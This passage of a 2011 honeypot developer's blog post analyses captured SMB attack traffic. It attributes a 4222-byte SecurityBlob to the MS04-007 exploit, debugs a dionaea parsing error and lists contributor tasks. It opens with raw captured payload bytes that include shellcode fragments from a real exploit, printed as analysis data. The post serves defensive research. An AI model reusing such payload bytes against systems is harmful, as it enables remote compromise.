\x01\xeb\xe38I\x8b4\x8b\x01\xee1\xff1\xc0\xfc\xac8\xe0t\x07\xc1\xcf\r\x01\xc7\xeb\xf4;|$$u\xe1\x8bZ$\x01\xebf\x8b\x0cK\x8bZ\x1c\x01\xeb\x8b\x04\x8b\x01\xe8\x89D$\x1ca\xc2\x08\x00\xeb\xfeCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC#\x82\x04 \x03\t\x00\xeb\x06\x90\x90\x90\x90\x90\x90\x03\x82\x04\x11\x00DDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDD' sizeof(4222) off= 27 goff= 63
        NativeOS            = b'\x00'         sizeof(  1) off=4249 goff=4285
        NativeLanManager    = b'\x00'         sizeof(  1) off=4250 goff=4286
        Extrabytes          = b'\x00\x00'     sizeof( -2) off=4251 goff=4287
###[ Raw sizeof(2) ]### 
           load                = b'\x00\x00'     sizeof(  2) off=  0 goff=4285

The SecurityBlob of 4222 bytes contains the payload, so this was MS04-007 - or kill-bill4), adding one to the number of distinct exploits used by the attacker to a maximum of 5.
If you feel challenged to add an incident if decoding the ASN.1 SecurityBlob fails, so there is a proper message in the logs, let me know.

Furthermore I noticed this 

###[ NBT Session Packet sizeof(4) ]### 
  TYPE                = Session Message sizeof(  1) off=  0 goff=  0
  RESERVED            = 0               sizeof(  1) off=  1 goff=  1
  LENGTH              = 102             sizeof(  2) off=  2 goff=  2
###[ SMB Header sizeof(32) ]### 
     Start               = b'\xffSMB'      sizeof(  4) off=  0 goff=  4
     Command             = SMB_COM_TRANSACTION sizeof(  1) off=  4 goff=  8
     Status              = 0               sizeof(  4) off=  5 goff=  9
     Flags               = CASES_ENSITIVITY+CANONICAL_PATHNAMES sizeof(  1) off=  9 goff= 13
     Flags2              = KNOWS_LONG_NAMES+PAGING_IO sizeof(  2) off= 10 goff= 14
     PIDHigh             = 0               sizeof(  2) off= 12 goff= 16
     Signature           = 0               sizeof(  8) off= 14 goff= 18
     Unused              = 0               sizeof(  2) off= 22 goff= 26
     TID                 = 65535           sizeof(  2) off= 24 goff= 28
     PID                 = 1932            sizeof(  2) off= 26 goff= 30
     UID                 = 0               sizeof(  2) off= 28 goff= 32
     MID                 = 31248           sizeof(  2) off= 30 goff= 34
###[ SMB Trans Request sizeof(42) ]### 
        WordCount           = 16              sizeof(  1) off=  0 goff= 36
        TotalParamCount     = 0               sizeof(  2) off=  1 goff= 37
        TotalDataCount      = 28              sizeof(  2) off=  3 goff= 39
        MaxParamCount       = 1024            sizeof(  2) off=  5 goff= 41
        MaxDataCount        = 65504           sizeof(  2) off=  7 goff= 43
        MaxSetupCount       = 0               sizeof(  1) off=  9 goff= 45
        Reserved1           = 0               sizeof(  1) off= 10 goff= 46
        Flags               = 0x0             sizeof(  2) off= 11 goff= 47
        Timeout             = 0               sizeof(  4) off= 13 goff= 49
        Reserved2           = 0               sizeof(  2) off= 17 goff= 53
        ParamCount          = 0               sizeof(  2) off= 19 goff= 55
        ParamOffset         = 74              sizeof(  2) off= 21 goff= 57
        DataCount           = 28              sizeof(  2) off= 23 goff= 59
        DataOffset          = 74              sizeof(  2) off= 25 goff= 61
        SetupCount          = 2               sizeof(  1) off= 27 goff= 63
        Reserved3           = 0               sizeof(  1) off= 28 goff= 64
        Setup               = [9728,64]       sizeof(  4) off= 29 goff= 65
        ByteCount           = 35              sizeof(  2) off= 33 goff= 69
        TransactionName     = b'\\PIPE\\\x00' sizeof(  7) off= 35 goff= 71
        Pad                 = b''             sizeof(  0) off= 42 goff= 78
        Param               = []              sizeof(  0) off= 42 goff= 78
        Pad1                = b''             sizeof(  0) off= 42 goff= 78
###[ DCERPC Header sizeof(16) ]### 
           Version             = 5               sizeof(  1) off=  0 goff= 78
           VersionMinor        = 0               sizeof(  1) off=  1 goff= 79
           PacketType          = Request         sizeof(  1) off=  2 goff= 80
           PacketFlags         = 0x2             sizeof(  1) off=  3 goff= 81
           DataRepresentation  = 16              sizeof(  4) off=  4 goff= 82
           FragLen             = 28              sizeof(  2) off=  8 goff= 86
           AuthLen             = 0               sizeof(  2) off= 10 goff= 88
           CallID              = 0               sizeof(  4) off= 12 goff= 90
###[ DCERPC Request sizeof(12) ]### 
              AllocHint           = 4               sizeof(  4) off=  0 goff= 94
              ContextID           = 0               sizeof(  2) off=  4 goff= 98
              OpNum               = 44              sizeof(  2) off=  6 goff=100
              StubData            = b'\x00\x00\x00\x00' sizeof(  4) off=  8 goff=102

which resulted in 

EOFError at EOFError()
 /opt/dionaea/lib/dionaea/python/dionaea/ndrlib.py:109 in unpack_long
        raise EOFError
 /opt/dionaea/lib/dionaea/python/dionaea/ndrlib.py:119 in unpack_string
        mc = self.unpack_long()
 /opt/dionaea/lib/dionaea/python/dionaea/smb/rpcservices.py:805 in handle_OpenPolicy
        SystemName = x.unpack_string()
 /opt/dionaea/lib/dionaea/python/dionaea/smb/rpcservices.py:83 in processrequest
        data = method(con, p)
 /opt/dionaea/lib/dionaea/python/dionaea/smb/smb.py:610 in process_dcerpc_packet
        resp = service.processrequest(service, self, dcep.OpNum, dcep)
 /opt/dionaea/lib/dionaea/python/dionaea/smb/smb.py:507 in process
        outpacket = self.process_dcerpc_packet(p.getlayer(DCERPC_Header))
 /opt/dionaea/lib/dionaea/python/dionaea/smb/smb.py:121 in handle_io_in
        r = self.process(p)
 binding.pyx:748 in dionaea.core.handle_io_in_cb (binding.c:5936)
        None

due to some bug in parsing the arguments in handle_OpenPolicy, if you feel challenged, let me know.

And there were even some calls to not implemented DCERPC functions 

SELECT
	COUNT(*),
	dcerpcrequests.dcerpcrequest_uuid,
	dcerpcservice_name,
	dcerpcrequest_opnum 
FROM
	dcerpcrequests 
	JOIN dcerpcservices ON(dcerpcrequests.dcerpcrequest_uuid == dcerpcservices.dcerpcservice_uuid) 
	LEFT OUTER JOIN dcerpcserviceops ON(dcerpcserviceops.dcerpcserviceop_opnum = dcerpcrequest_opnum AND dcerpcservices.dcerpcservice = dcerpcserviceops.dcerpcservice )  
WHERE
	dcerpcserviceop_name IS NULL AND
	connection >=1542
GROUP BY 	
	dcerpcrequests.dcerpcrequest_uuid,dcerpcservice_name,dcerpcrequest_opnum
ORDER BY
	COUNT(*) DESC;
#uuidserviceopnum
61ff70682-0a51-30e8-076d-740be8cee98bATSVC0

ATSVC opnum 0 is 5) part of the Task Scheduler Interface and used to schedule execution of commands.

TODO

Short summary for people who want to get involved:

  • adding support for ATSVC opnum 0 6)
  • fixing lsarpc/OpenPolicy to play with NULL args
  • logging MS04-007 if deserializing the asn.1 SecurityBlob fails - this is by far the most complex task

Given there is no hard proof of any MS11-020 exploitation public yet, I really doubt there is a problem. I bet every major security vendor is trying to be the first to publish on MS11-020, as the impact of this bug is foreseeable.
So while they all keep the silence, there is simply nothing to talk about.

1) @bufferzone We have yet to see a proof that ms11-020 is being actively exploited. Can you share more details, please?
2) MS11-020 - Vulnerability in SMB Server Could Allow Remote Code Execution
3) Zombieland Rule #2 – Double Tap
4) Microsoft ASN.1 remote exploit for CVE-2005-1935
5) , 6) 3.2.5.2.1 NetrJobAdd (Opnum 0)
This blog post was created on 2011-04-19 at 20:18 and last modified on 2011-04-19 at 23:16 by Markus. It is tagged with .

Comments



Related

Recent Posts

Tags

alix botnet bpf carniwwwhore ctypes dataviz dionaea ftp gnuplot libemu metasploit mssql nepenthes pcap python python3 smb sqlite ssl xmpp

Comments

2011/04/19/rumors.txt · Last modified: 2011/04/19 23:16 by common
chimeric.de = chi`s home Creative Commons License Valid CSS Driven by DokuWiki do yourself a favour and use a real browser - get firefox!! Recent changes RSS feed Valid XHTML 1.0